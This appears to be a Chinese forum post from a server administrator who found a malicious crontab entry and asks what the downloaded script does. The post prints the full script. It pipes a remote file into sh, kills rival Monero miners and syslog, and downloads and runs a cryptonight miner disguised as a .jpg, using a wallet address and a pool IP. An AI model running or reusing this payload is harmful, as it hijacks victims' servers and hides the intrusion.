问题找到了, crontab 里面有这么一行
`curl http://194.87.239.7/common/logo.jpg|sh`
文件下载下来是这样的
```
#!/bin/sh
rm -rf /tmp/index_bak.*
rm -rf /tmp/httpd.conf.*
rm -rf /tmp/httpd.conf
pkill -f 49hNrEaSKAx5FD8PE49Wa3DqCRp2ELYg8dSuqsiyLdzSehFfyvk4gDfSjTrPtGapqcfPVvMtAirgDJYMvbRJipaeTbzPQu4
pkill -f 4AniF816tMCNedhQ4J3ccJayyL5ZvgnqQ4X9bK7qv4ZG3QmUfB9tkHk7HyEhh5HW6hCMSw5vtMkj6jSYcuhQTAR1Sbo15gB
pkill -f 4813za7ePRV5TBce3NrSrugPPJTMFJmEMR9qiWn2Sx49JiZE14AmgRDXtvM1VFhqwG99Kcs9TfgzejAzT9Spm5ga5dkh8df
pkill -f cpuloadtest
pkill -f crypto-pool
pkill -f xmr
pkill -f prohash
pkill -f monero
pkill -f miner
pkill -f nanopool
pkill -f minergate
pkill rsyslog
pkill syslog
pkill -f "/tmp/apache"
pkill -f "/tmp/httpd.conf"
ps auxf|grep -v grep|grep "/tmp/apache"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/tmp/httpd.conf"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "
mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "crypto-pool"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "prohash"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "monero"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "miner"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "nanopool"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "minergate"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "
xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "
xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "
xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "zhuabcn@yahoo.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "49JsSwt7MsH5m8DPRHXFSEit9ZTWZCbWwS7QSMUTcVuCgwAU24gni1ydnHdrT9QMibLtZ3spC7PjmEyUSypnmtAG7pyys7F"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "479MD1Emw69idbVNKPtigbej7x1ZwFR1G3boyXUFfAB89uk2AztaMdWVd6NzCTfZVpDReKEAsVVBwYpTG8fsRK3X17jcDKm"|awk '{print $2}'|xargs kill -9
ps -fe|grep 43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R |grep -v grep
if [ $? -ne 0 ]
then
echo "start process....."
cat /proc/cpuinfo|grep aes>/dev/null
if [ $? -ne 1 ]
then
curl -o /tmp/cputest http://194.87.239.7/common/cputest.jpg
wget -O /tmp/cputest http://194.87.239.7/common/cputest.jpg
else
curl -o /tmp/cputest http://194.87.239.7/common/cputest_na.jpg
wget -O /tmp/cputest http://194.87.239.7/common/cputest_na.jpg
fi
chmod +x /tmp/cputest
nohup /tmp/cputest -B -a cryptonight -o stratum+tcp://212.129.44.156:80 -u 43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R -p x >/dev/null
else
echo "runing....."
fi
```
这个脚本是有什么用意么?